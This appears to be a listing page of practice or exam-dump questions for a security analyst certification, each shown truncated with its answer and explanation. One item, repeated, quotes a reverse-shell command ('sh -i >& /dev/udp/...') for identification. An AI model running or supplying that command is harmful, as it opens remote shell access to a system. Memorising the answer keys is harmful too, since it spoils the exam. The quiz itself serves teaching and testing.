Which of the following most likely describes the observed activity?

A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?A . There is an issue with the SSL certificate causinq port...

July 29, 2023 No Comments READ MORE +

Which of the following is being attempted?

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCE B. Reverse shell C. XSS D. SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...

July 29, 2023 No Comments READ MORE +

Which of the following is being attempted?

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCE B. Reverse shell C. XSS D. SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...

July 29, 2023 No Comments READ MORE +

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?A . Mean time to detect B. Number of exploits by tactic C. Alert volume D. Quantity of intrusion attemptsView AnswerAnswer: A Explanation: Mean time to detect...

July 29, 2023 No Comments READ MORE +

Which of the following best describes what the security program did?

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?A . Data enrichment B. Security control plane C. Threat feed combination...

July 29, 2023 No Comments READ MORE +

Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?A . Conduct regular red team exercises over the application in production B. Ensure that all implemented coding libraries are...

July 29, 2023 No Comments READ MORE +

When starting an investigation, which of the following must be done first?

When starting an investigation, which of the following must be done first?A . Notify law enforcement B. Secure the scene C. Seize all related evidence D. Interview the witnessesView AnswerAnswer: B Explanation: The first thing that must be done when starting an investigation is to secure the scene. Securing the...

July 28, 2023 No Comments READ MORE +

Which of the following systems should be prioritized for patching first?

An analyst is reviewing a vulnerability report for a server environment with the following entries: Which of the following systems should be prioritized for patching first?A . 10.101.27.98 B. 54.73.225.17 C. 54.74.110.26 D. 54.74.110.228View AnswerAnswer: D Explanation: The system that should be prioritized for patching first is 54.74.110.228, as it...

July 28, 2023 No Comments READ MORE +

Which of the following scripting languages was used in the script?

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?A . PowerShel B. Ruby C. Python D....

July 28, 2023 No Comments READ MORE +

Which of the following most likely describes the observed activity?

A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?A . There is an issue with the SSL certificate causinq port...

July 28, 2023 No Comments READ MORE +